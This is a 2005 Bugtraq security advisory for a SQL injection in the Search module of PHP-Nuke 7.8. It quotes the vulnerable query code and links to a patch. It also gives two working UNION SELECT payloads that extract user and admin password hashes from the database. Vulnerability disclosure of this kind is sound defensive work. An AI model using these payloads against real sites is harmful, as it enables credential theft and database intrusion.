[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Critical SQL Injection PHPNuke <= 7.8
From:       sp3x () securityreason ! com
Date:       2005-11-15 14:23:17
Message-ID: 20051115142317.7593.qmail () securityfocus ! com
[Download RAW message or body]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SecurityAlert SA027

Author: sp3x
GPG: http://securityreason.com/key/sp3x.gpg
Date: 15. November 2005

Affected software :
===================

PHPNuke version : 7.8 with all security fixes/patches

Not Affected software :
=======================

PHPNuke version : 7.9 + patch 3.1

Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online community \
or whatever you want to call it. The goal of PHP-Nuke is to have an automated web \
site to distribute news and articles with users system. Each user can submit comments \
to discuss the articles, just similar to Slashdot and many others. Main features \
include: web based admin, surveys, top page, access stats page with counter, user \
customizable box, themes manager for registered users, friendly administration GUI \
with graphic topic manager, option to edit or delete stories, option to delete \
comments, moderation system, Referers page to know who link us, sections manager, \
customizable HTML blocks, user and authors edit, an integrated Banners Ads system, \
search engine, backend/headlines generation (RSS/RDF format), and many, many more \
friendly functions. PHP-Nuke is written 100% in PHP and requires Apache Web server, \
PHP and a SQL (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase).  \
Support for 25 languages, Yahoo like search engine, Comments option in Polls, lot of \
themes, Ephemerids manager, File Manager, Headlines, download manager, faq manager, \
advanced blocks systems, reviews system, newsletter, categorized articles, \
multilanguage content management, phpBB Forums included and a lot more.


Vulnerabilities :
*****************

Critical SQL injection   :
==========================

IN module called "Search" there exists  SQL Injection bug, which can lead to stealing \
admin`s username and password md5 and also some sensitive data from database.


The problem exist in index.php so first let's see the source code of this file.

Original code from index.php :
- ---------------------------------
...
$query = stripslashes(check_html($query, "nohtml"));
		if ($type=="stories" OR !$type) {

			if ($category > 0) {
				$categ = "AND catid='$category' ";
			} else {
				$categ = "";
			}
			$q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, \
a.url, s.comments, s.topic from ".$prefix."_stories s, ".$prefix."_authors a where \
s.aid=a.aid $queryalang $categ";  if (isset($query)) $q .= "AND (s.title LIKE \
'%$query%' OR s.hometext LIKE '%$query%' OR s.bodytext LIKE '%$query%' OR s.notes \
LIKE '%$query%') ";  if (!empty($author)) $q .= "AND s.aid='$author' ";
			if (!empty($topic)) $q .= "AND s.topic='$topic' ";
			if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= \
'$days' ";  $q .= " ORDER BY s.time DESC LIMIT $min,$offset";
			$t = $topic;
			$result5 = $db->sql_query($q);
			$nrows = $db->sql_numrows($result5);
....
- -----------------------------------

Here we can see that there is stripslashes() used on $query variable . 
Using stripslashes(); before mysql statment lead to critical Sql Injection attack.
This Sql Injection will work in every type of Search .
Here i mean  : 
type=="stories"
type=="comments"
type=="reviews"
type=="users"

And also will work when  is_active("Downloads") , is_active("Web_Links") or \
is_active("Encyclopedia").

So we have here about 7 Critical SQL injections.

Exploit test :
- --------------

Enter this into Search field :
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* -> \
users passwords and logins

s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* -> nuke_authors \
passwords and logins

Exploit :
- ---------

http://securityreason.com/achievement_exploitalert/5

How to fix :
============

Download the new version of the script or update.
http://securityreason.com/patch/6

Greets :
========

Special greets : cXIb8O3 , pkw, pi3, p_e_a  and others .


Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.7 (GNU/Linux)

iD8DBQFDedrRhaZ93YsJSwQRArwUAKCaSKtt8nqY66P3xazISfls+1VfoACglrMU
yDQ955aOQpjnDMqXPvClE/I=
=+sx9
-----END PGP SIGNATURE-----


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic